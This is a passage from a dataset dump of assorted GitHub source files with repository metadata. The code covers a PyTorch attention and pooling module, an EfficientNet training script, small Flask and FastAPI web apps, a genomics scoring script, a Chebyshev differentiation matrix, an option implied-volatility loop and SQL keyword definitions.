{usd(zahl):^20.2f}$ | \")\n print(\"---------------------------------------------------------------------\")\n break\n #wenn es ein ValueError ist\n except ValueError:\n print(\"---------------------------------------------------------------------\")\n print(\"Du musst eine Zahl eingeben!\")\n continue\n #Bei jedem anderen Error\n except:\n print(\"Unbekannter Error!\")\n continue\n","repo_name":"Walnusskeim/Python_2.Kl","sub_path":"Python HÜ/Aufgabenstellung_für_Mitschüler.py","file_name":"Aufgabenstellung_für_Mitschüler.py","file_ext":"py","file_size_in_byte":1017,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"33551050892","text":"# pylint: disable=protected-access,unused-variable\nimport datetime\n\nimport pytest\n\nfrom taxi.util import dates\n\nfrom scripts.monrun.checks import too_many_expired\n\nNOW = datetime.datetime(2019, 5, 30, 14)\n\n\n@pytest.mark.parametrize(\n 'script_docs',\n [\n [],\n [{}],\n [\n {\n 'reason': 'expired',\n 'status': 'failed',\n 'updated': datetime.datetime(2019, 5, 20, 00),\n },\n {\n 'reason': 'expired',\n 'status': 'failed',\n 'updated': datetime.datetime(2019, 5, 30, 00),\n },\n ],\n ],\n)\n@pytest.mark.config(\n SCRIPTS_MONITORING_CONFIGS={\n 'too_many_expired': {'newer_then_delay': 1, 'threshold': 2},\n },\n)\n@pytest.mark.now(NOW.isoformat())\nasync def test_check_ok(scripts_tasks_app, setup_scripts, script_docs):\n await setup_scripts(script_docs)\n\n result = await too_many_expired._check(scripts_tasks_app, None)\n assert result == '0; OK'\n\n\n@pytest.mark.usefixtures('setup_many_scripts')\n@pytest.mark.now(NOW.isoformat())\n@pytest.mark.config(\n SCRIPTS_MONITORING_CONFIGS={\n 'too_many_expired': {'newer_then_delay': 5, 'threshold': 1},\n },\n)\nasync def test_check_warn(scripts_tasks_app):\n result = await too_many_expired._check(scripts_tasks_app, None)\n msg = (\n '1; WARN: 1 scripts are expired and '\n f'newer then {dates.timestring(NOW-datetime.timedelta(days=5))}'\n )\n assert result == msg\n","repo_name":"Alexander-Berg/2022-tests-examples-2","sub_path":"Taxi/test_scripts/monrun/checks/test_too_many_expired.py","file_name":"test_too_many_expired.py","file_ext":"py","file_size_in_byte":1508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"32533410368","text":"import torch\nimport torch.nn as nn\nimport numpy as np\n\n#============================================================Freeze============================================================\ndef freeze_net(module):\n for p in module.parameters():\n p.requires_grad = False\n\ndef unfreeze_net(module):\n for p in module.parameters():\n p.requires_grad = True\n\ndef freeze_params(params):\n for p in params:\n p.requires_grad = False\n\ndef unfreeze_params(params):\n for p in params:\n p.requires_grad = True\n\n#============================================================MLP============================================================\nclass MLP(nn.Module):\n def __init__(self, in_dim, h_dim, out_dim, dropout, layer_norm=True):\n super().__init__()\n self.layer1 = nn.Linear(in_dim, h_dim)\n self.layerNorm = nn.LayerNorm(h_dim) if layer_norm else None\n self.dropout = nn.Dropout(dropout)\n self.layer2 = nn.Linear(h_dim, out_dim)\n self.activate = nn.Tanh()\n \n def forward(self, input):\n output = self.layer1(self.dropout(input))\n output = self.activate(output)\n if self.layerNorm:\n output = self.layerNorm(output)\n return self.layer2(output)\n\n#============================================================Embeddings============================================================\nclass CustomizedEmbedding(nn.Module):\n def __init__(self, concept_num, concept_in_dim, concept_out_dim, use_contextualized=False,\n pretrained_concept_emb=None, freeze_ent_emb=True, scale=1.0, init_range=0.02):\n super().__init__()\n self.scale = scale\n self.use_contextualized = use_contextualized\n if not use_contextualized:\n self.emb = nn.Embedding(concept_num, concept_in_dim, padding_idx=0)\n if pretrained_concept_emb is not None:\n self.emb.weight.data.fill_(0)\n self.emb.weight.data[:concept_num].copy_(pretrained_concept_emb)\n else:\n self.emb.weight.data.normal_(mean=0.0, std=init_range)\n if freeze_ent_emb:\n freeze_net(self.emb)\n\n if concept_in_dim != concept_out_dim:\n self.cpt_transform = nn.Linear(concept_in_dim, concept_out_dim)\n self.activation = nn.GELU()\n\n def forward(self, index, contextualized_emb=None):\n \"\"\"\n index: size (bz, a)\n contextualized_emb: size (bz, b, emb_size) (optional)\n \"\"\"\n if contextualized_emb is not None:\n assert index.size(0) == contextualized_emb.size(0)\n if hasattr(self, 'cpt_transform'):\n contextualized_emb = self.activation(self.cpt_transform(contextualized_emb * self.scale))\n else:\n contextualized_emb = contextualized_emb * self.scale\n emb_dim = contextualized_emb.size(-1)\n return contextualized_emb.gather(1, index.unsqueeze(-1).expand(-1, -1, emb_dim))\n else:\n if hasattr(self, 'cpt_transform'):\n return self.activation(self.cpt_transform(self.emb(index) * self.scale))\n else:\n return self.emb(index) * self.scale\n\n#============================================================Pooling Methods============================================================\nclass MaxPoolLayer(nn.Module):\n \"\"\"\n A layer that performs max pooling along the sequence dimension\n \"\"\"\n def __init__(self):\n super().__init__()\n\n def forward(self, inputs, mask_or_lengths):\n \"\"\"\n inputs: tensor of shape (batch_size, seq_len, hidden_size)\n mask_or_lengths: tensor of shape (batch_size) or (batch_size, seq_len)\n\n returns: tensor of shape (batch_size, hidden_size)\n \"\"\"\n bs, sl, _ = inputs.size()\n if len(mask_or_lengths.size()) == 1:\n mask = (torch.arange(sl, device=inputs.device).unsqueeze(0).expand(bs, sl) >= mask_or_lengths.unsqueeze(1))\n else:\n mask = mask_or_lengths\n masked_inputs = inputs.masked_fill(mask.unsqueeze(-1).expand_as(inputs), float('-inf'))\n max_pooled = masked_inputs.max(1)[0]\n return max_pooled\n\nclass MeanPoolLayer(nn.Module):\n \"\"\"\n A layer that performs mean pooling along the sequence dimension\n \"\"\"\n\n def __init__(self):\n super().__init__()\n\n def forward(self, inputs, mask_or_lengths):\n \"\"\"\n inputs: tensor of shape (batch_size, seq_len, hidden_size)\n mask_or_lengths: tensor of shape (batch_size) or (batch_size, seq_len)\n\n returns: tensor of shape (batch_size, hidden_size)\n \"\"\"\n bs, sl, _ = inputs.size()\n if len(mask_or_lengths.size()) == 1:\n mask = (torch.arange(sl, device=inputs.device).unsqueeze(0).expand(bs, sl) >= mask_or_lengths.unsqueeze(1))\n lengths = mask_or_lengths.float()\n else:\n mask, lengths = mask_or_lengths, (1 - mask_or_lengths.float()).sum(1)\n masked_inputs = inputs.masked_fill(mask.unsqueeze(-1).expand_as(inputs), 0.0)\n mean_pooled = masked_inputs.sum(1) / lengths.unsqueeze(-1)\n return mean_pooled\n\n\nclass MatrixVectorScaledDotProductAttention(nn.Module):\n def __init__(self, temperature, attn_dropout=0.1):\n super().__init__()\n self.temperature = temperature\n self.dropout = nn.Dropout(attn_dropout)\n self.softmax = nn.Softmax(dim=1)\n def forward(self, q, k, v, mask=None):\n \"\"\"\n q: tensor of shape (n*b, d_k)\n k: tensor of shape (n*b, l, d_k)\n v: tensor of shape (n*b, l, d_v)\n returns: tensor of shape (n*b, d_v), tensor of shape(n*b, l)\n \"\"\"\n attn = (q.unsqueeze(1) * k).sum(2) # (n*b, 1, d_k)*(n*b, l, d_k) -> (n*b, l)\n attn = attn / self.temperature\n if mask is not None:\n attn = attn.masked_fill(mask, -np.inf)\n attn = self.softmax(attn)\n attn = self.dropout(attn) #(n*b, l)\n output = (attn.unsqueeze(2) * v).sum(1) #(n*b, l, 1)*(n*b, l, d_v) -> (n*b, d_v)\n return output, attn\n\n\nclass AttPoolLayer(nn.Module):\n def __init__(self, d_q, d_k, dropout=0.1):\n super().__init__()\n self.w_qs = nn.Linear(d_q, d_k)\n nn.init.normal_(self.w_qs.weight, mean=0, std=np.sqrt(2.0 / (d_q + d_k)))\n self.attention = MatrixVectorScaledDotProductAttention(temperature=np.power(d_k, 0.5))\n self.dropout = nn.Dropout(dropout)\n def forward(self, q, k, mask=None):\n \"\"\"\n q: tensor of shape (b, d_q)\n k: tensor of shape (b, l, d_k)\n mask: tensor of shape (b, l) (optional, default None)\n returns: tensor of shape (b, d_k)\n \"\"\"\n qs = self.w_qs(q) # (b, d_k)\n output, attn = self.attention(qs, k, k, mask=mask)\n output = self.dropout(output)\n return output, attn\n\nclass MultiheadAttPoolLayer(nn.Module):\n\n def __init__(self, n_head, d_q_original, d_k_original, dropout=0.1):\n super().__init__()\n assert d_k_original % n_head == 0 # make sure the output dimension equals to d_k_origin\n self.n_head = n_head\n self.d_k = d_k_original // n_head\n self.d_v = d_k_original // n_head\n\n self.w_qs = nn.Linear(d_q_original, n_head * self.d_k)\n self.w_ks = nn.Linear(d_k_original, n_head * self.d_k)\n self.w_vs = nn.Linear(d_k_original, n_head * self.d_v)\n\n nn.init.normal_(self.w_qs.weight, mean=0, std=np.sqrt(2.0 / (d_q_original + self.d_k)))\n nn.init.normal_(self.w_ks.weight, mean=0, std=np.sqrt(2.0 / (d_k_original + self.d_k)))\n nn.init.normal_(self.w_vs.weight, mean=0, std=np.sqrt(2.0 / (d_k_original + self.d_v)))\n\n self.attention = MatrixVectorScaledDotProductAttention(temperature=np.power(self.d_k, 0.5))\n self.dropout = nn.Dropout(dropout)\n\n def forward(self, q, k, mask=None):\n \"\"\"\n q: tensor of shape (b, d_q_original)\n k: tensor of shape (b, l, d_k_original)\n mask: tensor of shape (b, l) (optional, default None)\n returns: tensor of shape (b, n*d_v)\n \"\"\"\n n_head, d_k, d_v = self.n_head, self.d_k, self.d_v #n_head must be divided by d_k -> n_head = 2or4\n\n bs, _ = q.size()\n bs, len_k, _ = k.size()\n\n qs = self.w_qs(q).view(bs, n_head, d_k) # (b, d_q_ori) -> (b, n_head*d_k) -> (b, n_head, d_k)\n ks = self.w_ks(k).view(bs, len_k, n_head, d_k) # (b, l, d_k_ori) -> (b, l, n_head*d_k) -> (b, l, n_head, d_k)\n vs = self.w_vs(k).view(bs, len_k, n_head, d_v) # (b, l, n_head, d_v)\n\n qs = qs.permute(1, 0, 2).contiguous().view(n_head * bs, d_k) #(n_head * bs, d_k)\n ks = ks.permute(2, 0, 1, 3).contiguous().view(n_head * bs, len_k, d_k) #(n_head * bs, len_k, d_k)\n vs = vs.permute(2, 0, 1, 3).contiguous().view(n_head * bs, len_k, d_v) #(n_head * bs, len_k, d_v)\n\n if mask is not None:\n mask = mask.bool() ##\n mask = ~mask ##\n mask = mask.repeat(n_head, 1) #(n_head*bs, len_k)\n output, attn = self.attention(qs, ks, vs, mask=mask)# (n*b, d_v), (n*b, l)\n\n output = output.view(n_head, bs, d_v)\n output = output.permute(1, 0, 2).contiguous().view(bs, n_head * d_v) # (b, n*dv)\n output = self.dropout(output)\n return output, attn\n\nclass BilinearAttentionLayer(nn.Module):\n def __init__(self, query_dim, value_dim):\n super().__init__()\n self.linear = nn.Linear(value_dim, query_dim, bias=False)\n self.softmax = nn.Softmax(1)\n def forward(self, query, value, node_mask=None):\n \"\"\"\n query: tensor of shape (batch_size, query_dim)\n value: tensor of shape (batch_size, seq_len, value_dim)\n node_mask: tensor of shape (batch_size, seq_len)\n\n returns: tensor of shape (batch_size, value_dim)\n \"\"\"\n attn = self.linear(value).bmm(query.unsqueeze(-1)) #(bs, seq_len, query_dim) * (bs, query_dim, 1) -> (bs, seq_len, 1)\n attn = self.softmax(attn.squeeze(-1)) #(bs, seq_len)\n if node_mask is not None:\n attn = attn * node_mask\n attn = attn / attn.sum(1, keepdim=True)\n pooled = attn.unsqueeze(1).bmm(value).squeeze(1) #(bs, 1, seq_len) * (bs, seq_len, value_dim) -> (bs,1,value_dim) -> (bs, value_dim)\n return pooled, attn","repo_name":"Anni-Zou/Decker","sub_path":"model/layers.py","file_name":"layers.py","file_ext":"py","file_size_in_byte":10349,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"66"} +{"seq_id":"19831273407","text":"from efficientnet_pytorch import EfficientNet\nfrom transformers import get_cosine_schedule_with_warmup\nfrom label_smoothing import apply_label_smoothing\nfrom data import test, submission\nfrom dataloader import loader_train, loader_valid, loader_test, loader_tta\nfrom train import train_val\nimport torch\nimport torch.nn as nn\nimport random\nimport numpy as np\nimport os\n\n# 시드값 고정\nseed = 10\nos.environ['PYTHONHASHSEED'] = str(seed)\nrandom.seed(seed)\nnp.random.seed(seed)\ntorch.manual_seed(seed)\ntorch.cuda.manual_seed(seed)\ntorch.cuda.manual_seed_all(seed)\ntorch.backends.cudnn.deterministic = True\ntorch.backends.cudnn.benchmark = False\ntorch.backends.cudnn.enabled = False\n\n# GPU\ndevice = torch.device('cuda:0')\n\n# 하이퍼파라미터\nbatch_size = 32\nepochs = 3\nalpha = 0.001\nthreshold = 0.999\ntarget = ['healthy', 'multiple_diseases', 'rust', 'scab']\n\n# 모델 생성\nmodel = EfficientNet.from_pretrained('efficientnet-b0', num_classes=4)\nmodel = model.to(device)\n\n# 손실함수, 옵티마이저, 스케줄러\ncriterion = nn.CrossEntropyLoss()\noptimizer = torch.optim.AdamW(model.parameters(), lr=0.00006, weight_decay=0.0001)\nscheduler = get_cosine_schedule_with_warmup(optimizer, \n num_warmup_steps=len(loader_train)*5,\n num_training_steps=len(loader_train)*epochs)\n\n# 모델 훈련 및 성능 검증\ntrain_val(model, epochs, loader_train, loader_valid, optimizer, criterion, scheduler)\n\n# 예측(1)\nmodel.eval()\npreds = np.zeros((len(test), 4))\nwith torch.no_grad():\n for i, images in enumerate(loader_test):\n images = images.to(device)\n outputs = model(images)\n preds_part = torch.softmax(outputs.cpu(), dim=1).squeeze().numpy()\n preds[i*batch_size:(i+1)*batch_size] += preds_part\n\n# 결과 제출(1)\nsubmission_test = submission.copy()\nsubmission_test[['healthy', 'multiple_diseases', 'rust', 'scab']] = preds\nsubmission_test.to_csv('submission_test.csv', index=False)\nsubmission_test_ls = submission_test.copy()\nsubmission_test_ls[target] = apply_label_smoothing(submission_test_ls, target, alpha, threshold)\nsubmission_test_ls.to_csv('submission_test_ls.csv', index=False)\n\n# 예측(2)\nnum_tta = 5\npreds_tta = np.zeros((len(test), 4))\nfor _ in range(num_tta):\n with torch.no_grad():\n for i, images in enumerate(loader_tta):\n images = images.to(device)\n outputs = model(images)\n preds_part = torch.softmax(outputs.cpu(), dim=1).squeeze().numpy()\n preds_tta[i*batch_size:(i+1)*batch_size] += preds_part\npreds_tta /= num_tta\n\n# 결과 제출(2)\nsubmission_tta = submission.copy()\nsubmission_tta[['healthy', 'multiple_diseases', 'rust', 'scab']] = preds_tta\nsubmission_tta.to_csv('submission_tta.csv', index=False)\nsubmission_tta_ls = submission_tta.copy()\nsubmission_tta_ls[target] = apply_label_smoothing(submission_tta_ls, target, alpha, threshold)\nsubmission_tta_ls.to_csv('submission_tta_ls.csv', index=False)","repo_name":"chaiminwoo0223/Data-Science","sub_path":"09/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3001,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"29379382682","text":"from flask import Flask, render_template, redirect, jsonify\nfrom food import Food\nfrom foodProducer import FoodProducer\nfrom flask_cors import CORS\nimport requests\nimport urllib.parse\n\napp = Flask(__name__,static_url_path='', template_folder=\"../FrontEnd\", static_folder=\"../FrontEnd\")\nCORS(app)\n\n\n# path = \"35.203.43.136\"\n# local = \"127.0.0.1\"\n\n\n@app.route('/main')\ndef hello_world():\n return 'test!'\n\n\n# @app.route('//')\n# def render_static(page_name):\n# print(\"Getting: \" + page_name)\n# return render_template('%s' % page_name)\n\n\n@app.route(\"/\")\ndef main_page():\n return render_template('index.html')\n\n\n@app.route(\"/api/search/\")\ndef search_food(food):\n food = urllib.parse.unquote_plus(urllib.parse.unquote(food))\n result = foodset.search_food(food)\n print(\"Foodset search: \" + str(result))\n return jsonify(result)\n\n\n@app.route(\"/api/food/\")\ndef get_food(id: str):\n food = foodset.get_food(int(id))\n if food is None:\n return {}\n return food.to_json()\n\n\n@app.route(\"/api/link/\")\ndef does_site_load(id: str):\n f = foodset.get_food(int(id))\n req = requests.get(f.recipe_url)\n if \"X-Frame-Options\" not in req.headers:\n return \"True\"\n elif req.headers[\"X-Frame-Options\"].strip().lower() in [\"deny\", \"sameorigin\"]:\n return \"False\"\n return \"True\"\n\n\nif __name__ == '__main__':\n foodset = FoodProducer()\n app.run(host='0.0.0.0', debug=True, port=80)\n","repo_name":"SachaGoldman/FeelingHungry","sub_path":"BackEnd/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1476,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"1707871992","text":"from fastapi import FastAPI, Request, Form\r\nfrom fastapi.templating import Jinja2Templates\r\nfrom fastapi.staticfiles import StaticFiles\r\n\r\nimport io, base64\r\nimport numpy as np\r\nimport matplotlib\r\nmatplotlib.use('Agg')\r\nimport matplotlib.pyplot as plt\r\n\r\napp = FastAPI()\r\napp.mount('/static', StaticFiles(directory='static'), name='static')\r\ntemplates = Jinja2Templates(directory='templates')\r\n\r\ndef __solve(a: int, b: int, c: int):\r\n roots = np.roots([a, b, c])\r\n roots = roots[~np.iscomplex(roots)]\r\n roots = np.unique(roots).tolist()\r\n roots.sort()\r\n return roots\r\n\r\ndef __quadeqeval(a: int, b: int, c: int, x: np.array):\r\n return a*x**2 + b*x + c\r\n\r\ndef __create_func_label(a: int, b: int, c: int):\r\n label = str()\r\n if a != 0:\r\n label += f'{a}x^2'\r\n if b > 0:\r\n label += f'+{b}x'\r\n elif b < 0:\r\n label += f'{b}x'\r\n if c > 0:\r\n label += f'+{c}'\r\n elif c < 0:\r\n label += f'{c}'\r\n \r\n return label\r\n\r\n@app.get('/solve')\r\nasync def solve(a, b, c):\r\n coeffs = tuple(map(int, (a, b, c)))\r\n if coeffs[0] == coeffs[1] == coeffs[2] == 0:\r\n return {'message': 'One of the coefficients must be non-zero'}\r\n roots = __solve(*coeffs)\r\n return {'roots': roots}\r\n\r\n@app.get('/main')\r\nasync def home(request: Request):\r\n return templates.TemplateResponse('main.html',\r\n {'request': request})\r\n\r\n@app.post('/show_plot')\r\nasync def show_plot(request: Request,\r\n a_coef: int = Form(...),\r\n b_coef: int = Form(...),\r\n c_coef: int = Form(...)):\r\n if a_coef == b_coef == c_coef == 0:\r\n return {'message': 'One of the coefficients must be non-zero'}\r\n roots = __solve(*(a_coef, b_coef, c_coef))\r\n if a_coef != 0:\r\n vertex = -int(b_coef / (2 * a_coef))\r\n else:\r\n vertex = roots[0] if len(roots) != 0 else 0\r\n\r\n x = np.linspace(-10 + vertex, vertex + 10, 1000)\r\n y = __quadeqeval(a_coef, b_coef, c_coef, x)\r\n \r\n fig = plt.figure()\r\n plt.plot(x, y, label=f'$y={__create_func_label(a_coef, b_coef, c_coef)}$')\r\n if len(roots) != 0:\r\n plt.scatter(roots, np.zeros(len(roots)), marker='x', c='r', label='roots')\r\n plt.axhline(0, c='k', alpha=.5)\r\n plt.axvline(0, c='k', alpha=.5)\r\n plt.xlabel('$x$')\r\n plt.ylabel('$y$')\r\n plt.grid()\r\n plt.legend()\r\n \r\n pngImage = io.BytesIO()\r\n fig.savefig(pngImage)\r\n pngImageB64String = base64.b64encode(pngImage.getvalue()).decode('ascii')\r\n\r\n return templates.TemplateResponse('plot.html',\r\n {'request': request,\r\n 'picture': pngImageB64String,\r\n 'roots': roots})","repo_name":"Temyaroslav/MDS2020","sub_path":"data_scraping/week9/fastapi_quadratic/server/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2750,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"66"} +{"seq_id":"10600686503","text":"#!usr/lib/python\n# -*- coding:utf-8 -*-\n\n##------------------------------------------------------------------------------------------------\n##------------------------------------------------------------------------------------------------\n## Usage:\n## python *.py gene_CDS.bed score.bed chromosome\n##------------------------------------------------------------------------------------------------\n##------------------------------------------------------------------------------------------------\n\nfrom __future__ import division\nimport sys\nimport os\nimport subprocess\n\n\ndb1=os.path.abspath(sys.argv[1]) \nfullname=os.path.basename(db1)\nname1=os.path.splitext(fullname)[0]\nbed=sys.argv[2] \nkeyword=sys.argv[3] \n\ndef head():\n f1=open(db1,'r')\n f3=open('%s.gene_dengfen'%(name1),'w')\n f4=open('%s.gene_ave_median'%(name1),'w')\n f11=f1.readlines()\n os.system('sort -k1,1 -k2,2n %s>sort-k2-%s'%(db1,name1))\n min0=subprocess.Popen('''head -n1 sort-k2-%s|awk '{print $2}' '''%(name1),shell=True,stdout=subprocess.PIPE)\n mini=min0.communicate()[0].strip('\\n')\n os.system('sort -k1,1 -k3,3n %s>sort-k3-%s'%(db1,name1))\n maxi0=subprocess.Popen('''tail -n1 sort-k3-%s|awk '{print $3}' '''%(name1),shell=True,stdout=subprocess.PIPE)\n maxi=maxi0.communicate()[0].strip('\\n')\n os.system('''grep %s$\"\\t\" %s|awk -F '\\t' '{if(%s<=$2&&$3<=%s)print $0}' >%s.part.bed'''%(keyword,bed,mini,maxi,name1))\n f2=open('%s.part.bed'%(name1),'r')\n f22=f2.readlines()\n lines=len(f11)\n ac=''\n for i in range(lines):\n #chr_os=f11[i].split()[0]\n #start_os=int(f11[i].split()[1])\n #end_os=int(f11[i].split()[2])\n gene_ID=f11[i].split()[3]\n cds=f11[i].split()[5][:-1]\n dire=f11[i].split()[4]\n num=0\n list1=[]\n for k in cds.split(';'):\n begin=int(k.split(':')[0])\n end=int(k.split(':')[1])\n cha=end-begin\n num+=cha\n for a in range(cha):\n begin+=1\n list1.append(begin)\n if len(list1)<20:\n gene_score=[]\n for b in f22:\n position=b.strip().split('\\t')[2]\n if int(position) <=list1[-1] and int(position) in list1:\n score=float(b.strip().split('\\t')[3])\n gene_score.append(score)\n gene_average=sum(gene_score)/num\n for j in range(20):\n f3.write('gene'+str(j+1)+'\\t'+str(gene_average)+'\\n')\n else: \n yu=len(list1)%20\n bases=(len(list1)-yu)/20\n l_qian=[bases+1]\n l_hou=[bases]\n l=l_qian*yu+l_hou*(20-yu)\n start_sites=0\n gene_score=[]\n for j in range(20):\n gene=list1[start_sites:start_sites+int(l[j])]\n maxi=gene[-1]\n list_of_score=[]\n start_sites=start_sites+int(l[j])\n for b in f22:\n position=b.strip().split('\\t')[2]\n if int(position) <=maxi and int(position) in gene:\n score=float(b.strip().split('\\t')[3])\n list_of_score.append(score)\n average=sum(list_of_score)/len(gene)\n gene_score+=list_of_score\n if dire=='+':\n ac='gene'\n else:\n ac='-gene'\n f3.write(ac+str(j+1)+'\\t'+str(average)+'\\n')\n\n gene_average=sum(gene_score)/len(list1)\n\n if len(gene_score)<=num:\n list11=gene_score+[0]*(num-len(gene_score))\n list2=sorted(list11)\n else:\n list2=sorted(gene_score)\n if len(list2)%2==1:\n median=list2[int((len(list2)+1)/2)]\n else:\n median=(list2[int(len(list2)/2)-1]+list2[int(len(list2)/2)])/2\n f4.write(gene_ID+'\\t'+str(gene_average)+'\\t'+str(median)+'\\n')\n\n\n os.system('rm %s.part.bed sort-k2-%s sort-k3-%s'%(name1,name1,name1))\n f1.close()\n f2.close()\n f3.close()\n\nif __name__==\"__main__\":\n head()\n","repo_name":"KirstLab/CNS_Nitrogen_Fixing_Clade","sub_path":"1_Whole_Genome_Alignments/CNSpipeline_modified/gene-cds20dengfen-ave-median.py","file_name":"gene-cds20dengfen-ave-median.py","file_ext":"py","file_size_in_byte":4076,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"25671960119","text":"import numpy as np\n\ndef cheb4c(N):\n \n \"\"\" \n Original Matlab function downloaded from https://appliedmaths.sun.ac.za/~weideman/research/differ.html\n Article : Weideman, J. A. & Reddy, S. C. A MATLAB differentiation matrix suite. ACM Trans. Math. Softw. 26, 465–519 (2000).\n \n -------------------------------\n The function [x, D4] = cheb4c(N) computes the fourth \n derivative matrix on Chebyshev interior points, incorporating \n the clamped boundary conditions u(1)=u'(1)=u(-1)=u'(-1)=0.\n \n Input:\n N: N-2 = Order of differentiation matrix. \n (The interpolant has degree N+1.)\n \n Output:\n x: Interior Chebyshev points (vector of length N-2)\n D4: Fourth derivative matrix (size (N-2)x(N-2))\n --------------------------------------\n \n The code implements two strategies for enhanced \n accuracy suggested by W. Don and S. Solomonoff in \n SIAM J. Sci. Comp. Vol. 6, pp. 1253--1268 (1994).\n The two strategies are (a) the use of trigonometric \n identities to avoid the computation of differences \n x(k)-x(j) and (b) the use of the \"flipping trick\"\n which is necessary since sin t can be computed to high\n relative precision when t is small whereas sin (pi-t) cannot.\n \n J.A.C. Weideman, S.C. Reddy 1998.\n \n \"\"\" \n I = np.identity(N-2) # Identity Matrix\n L = I==1 # Logical Identity\n \n n1 = np.floor(N/2-1).astype(int) # Indices used for flipping trick.\n n2 = np.ceil(N/2-1).astype(int)\n \n k = np.arange(1,N-1).reshape(N-2,1) # Compute theta vecor\n th = k*np.pi/(N-1)\n \n x = np.sin(np.pi*np.arange(N-3,1-N,-2).reshape(N-2,1) / (2*(N-1))) # Compute interior Chebyshev points\n \n s = np.vstack(((np.sin(th[0:n1])), # s = sin(th))\n (np.flipud(np.sin(th[0:n2])))))\n \n alpha = s**4 # Compute the weight functions and its derivatives\n beta1 = -4*s**2*x/alpha\n beta2 = 4*(3*x**2-1)/alpha \n beta3 = 24*x/alpha\n beta4 = 24/alpha \n \n B = np.vstack(((beta1.T),\n (beta2.T),\n (beta3.T),\n (beta4.T)))\n \n \n T = np.tile(th/2,[1,N-2])\n DX = 2*np.sin((np.transpose(T)+T))*np.sin(np.transpose(T)-T) # Trignometric Identity\n DX = np.vstack(((DX[0:n1,:]),\n (-np.flipud(np.fliplr(DX[0:n2,:]))))) # Flipping trick\n DX[L] = np.ones(N-2) # Put 1's on the main diagonal of DX.\n \n ss = s**2*((-1*np.ones(N-2).reshape(N-2,1))**k) # Compute the matrix entrie c(k)/c(j)\n S = np.tile(ss,[1,N-2])\n C = S/S.T\n\n Z = 1/DX # Z contains entries 1/(x(k)-x(j)) with zeros on the diagonal.\n Z[L] = np.zeros(N-2)\n \n X = Z.T\n indx=np.setxor1d(np.arange(0,(N-2)**2),np.arange(0,(N-2)**2,N-1))\n X = np.reshape(np.ravel(X,order='F')[indx],(N-3,N-2),order='F')\n \n Y = np.ones([N-3,N-2]) # Initialize Y and D vectors. Y contains matrix of cumulative sums\n D = np.identity(N-2) # D scaled differaentiation matrices\n DM = np.zeros([N-2,N-2,4])\n \n for ell in range(1,5):\n \n Y = np.cumsum(np.vstack(((B[ell-1,:]),\n (ell*Y[0:N-3,:]*X))),axis=0)\n \n D = ell*Z*(C*np.tile(np.diag(D).reshape(N-2,1),[1,N-2]) - D) # Off-diagonals\n D[L] = Y[N-3,:] # Correct main diagonal of D\n DM[:,:,ell-1] = D # Store current D in DM\n \n return DM[:,:,3]","repo_name":"PavanVKashyap/Linear_stability_Analysis","sub_path":"cheb4c.py","file_name":"cheb4c.py","file_ext":"py","file_size_in_byte":3856,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"18867083334","text":"\"\"\"\n Name : 4375OS_10_15_for_loop_implied_vol_p4f.py\n Book : Python for Finance\n Publisher: Packt Publishing Ltd. \n Author : Yuxing Yan\n Date : 12/26/2013\n email : yany@canisius.edu\n paulyxy@hotmail.com\n\"\"\"\nimport p4f\nS=40\nK=40\nT=0.5\nr=0.05\nc=3.30\nfor i in range(200):\n sigma=0.005*(i+1)\n diff=c-p4f.bs_call(S,K,T,r,sigma)\n if abs(diff)<=0.01:\n print(i,sigma, diff)\n","repo_name":"xhd2015/Python","sub_path":"Python-for-Finance/4375OS_Code/4375OS_10_Code/4375OS_10_15_for_loop_implied_vol_p4f.py","file_name":"4375OS_10_15_for_loop_implied_vol_p4f.py","file_ext":"py","file_size_in_byte":417,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"66"} +{"seq_id":"72969718610","text":"from mo_dots import Null\n\nfrom moz_sql_parser.utils import *\n\n# SQL CONSTANTS\nNULL = Keyword(\"null\", caseless=True).addParseAction(lambda: [Null])\nTRUE = Keyword(\"true\", caseless=True).addParseAction(lambda: [True])\nFALSE = Keyword(\"false\", caseless=True).addParseAction(lambda: [False])\nNOCASE = Keyword(\"nocase\", caseless=True)\nASC = Keyword(\"asc\", caseless=True)\nDESC = Keyword(\"desc\", caseless=True)\n\n# SIMPLE KEYWORDS\nAS = Keyword(\"as\", caseless=True).suppress()\nALL = Keyword(\"all\", caseless=True)\nBY = Keyword(\"by\", caseless=True).suppress()\nCAST = Keyword(\"cast\", caseless=True)\nCROSS = Keyword(\"cross\", caseless=True)\nDISTINCT = Keyword(\"distinct\", caseless=True)\nFROM = Keyword(\"from\", caseless=True).suppress()\nFULL = Keyword(\"full\", caseless=True)\nGROUP = Keyword(\"group\", caseless=True).suppress()\nHAVING = Keyword(\"having\", caseless=True).suppress()\nINNER = Keyword(\"inner\", caseless=True)\nINTERVAL = Keyword(\"interval\", caseless=True)\nJOIN = Keyword(\"join\", caseless=True)\nLEFT = Keyword(\"left\", caseless=True)\nLIKE = Keyword(\"like\", caseless=True)\nLIMIT = Keyword(\"limit\", caseless=True).suppress()\nOFFSET = Keyword(\"offset\", caseless=True).suppress()\nON = Keyword(\"on\", caseless=True).suppress()\nORDER = Keyword(\"order\", caseless=True).suppress()\nOUTER = Keyword(\"outer\", caseless=True)\nOVER = Keyword(\"over\", caseless=True).suppress()\nPARTITION = Keyword(\"partition\", caseless=True).suppress()\nRIGHT = Keyword(\"right\", caseless=True)\nRLIKE = Keyword(\"rlike\", caseless=True)\nSELECT = Keyword(\"select\", caseless=True).suppress()\nTHEN = Keyword(\"then\", caseless=True).suppress()\nUNION = Keyword(\"union\", caseless=True)\nUSING = Keyword(\"using\", caseless=True).suppress()\nWHEN = Keyword(\"when\", caseless=True).suppress()\nWHERE = Keyword(\"where\", 